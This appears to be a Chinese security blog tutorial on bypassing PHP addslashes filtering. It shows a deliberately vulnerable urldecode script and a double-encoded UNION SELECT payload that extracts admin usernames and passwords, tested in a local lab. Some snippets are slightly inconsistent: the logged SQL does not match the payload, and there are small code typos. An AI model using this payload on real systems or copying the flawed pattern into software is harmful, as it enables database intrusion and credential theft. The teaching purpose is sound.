0x01 前言

现在的WEB程序基本都有对SQL注入的全局过滤，运维人员配置PHP环境是一般会开启魔术引号GPC，即magic_quotes_gpc=On的情况下，如果输入的数据有单引号（’）、双引号（”）、反斜线（\）与 NUL（ 字符）等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了，所以现在一般都用addslashes函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发，对GET、POST和COOKIE等传递的参数通常使用addslashes函数进行转义，并引入一个类似common.php的文件进行处理addslashes函数对接收的参数进行过滤，尤其是单引号。处理代码如下：

if (!empty($_GET))
{
$_GET = addslashes_deep($_GET);
}
if (!empty($_POST))
{
$_POST = addslashes_deep($_POST);
}
if (!empty($_COOKIE))
{
$_COOKIE = addslashes_deep($_COOKIE);
}
...
function addslashes_deep($value)
{
if (empty($value))
{
return $value;
}
else
{
if (!get_magic_quotes_gpc)
{
$value=is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
}
else
{
$value=is_array($value) ? array_map('addslashes_deep', $value) : mystrip_tags($value);
}
return $value;
}
}

addslashes_deep函数会判断GPC是否开启，如果没有开启就会对GET、POST和COOKIE传递的参数进行转义。然而仅仅使用这种方式会存在很多绕过的情况。接下来两篇会介绍这种防护下的存在被绕过的一些场景和案例～，这里有几篇确定好。

0x02 准备

知识储备：php基础、MySql入门

工具：notepad++

服务器环境：wamp

测试代码和sql：微信回复『代码2』 需要更新。

0x03 全局防护Bypass上篇的脑图

0x04 编码解码函数导致的Bypass

一些编码解码的函数像urldecode、base64decode的使用会导致绕过addslashes函数的全局防护，以urldecode函数为例，缺陷代码如下：

<?php
require_once('common.php');
$conn = mysql_connect('localhost', 'root', 'braid') or die('bad!');
mysql_query("SET NAMES binary'");
mysql_select_db('test', $conn) OR emMsg("数据库连接失败");
//这里使用了urldecode进行解码
$id = isset($_GET['id']) ? urldecode($_GET['id']) : 1;
//这里的sql语句有单引号保护，即特殊字符像单引号就会通过addslashes的处理
$sql = "SELECT * FROM news WHERE id='{$id}'";
$result = mysql_query($sql, $conn) or die(mysql_error);
?>

说明单引号经过了addslashes函数的转义，我们查下sql查询的日志，确实是对单引号进行转义处理了：

SELECT * FROM news WHERE id='1\''

这种报错在安全测试人员眼里就是注入的标志。进一步观察数据库，发现除了news表外还有个admin表，我们可以构造获取管理员账户密码的语句”
http://localhost/sqltest/urldecode.php?id=1%2527union select 1,2,concat(name,0x23,pass) from admin%23”

对应执行的sql语句：

SELECT SQL_CALC_FOUND_ROWS * FROM news WHERE id = '-1' union select 1 , 2, concat( name, 0x23, pass ) from admin

今天的内容就这里，大家有兴趣的可以评论或者留言，可以跟作者互动，谢谢你的转发和关注。：）

301强烈推荐内容，想必您会喜欢：

长按二维码，关注301在路上。

微信：2036234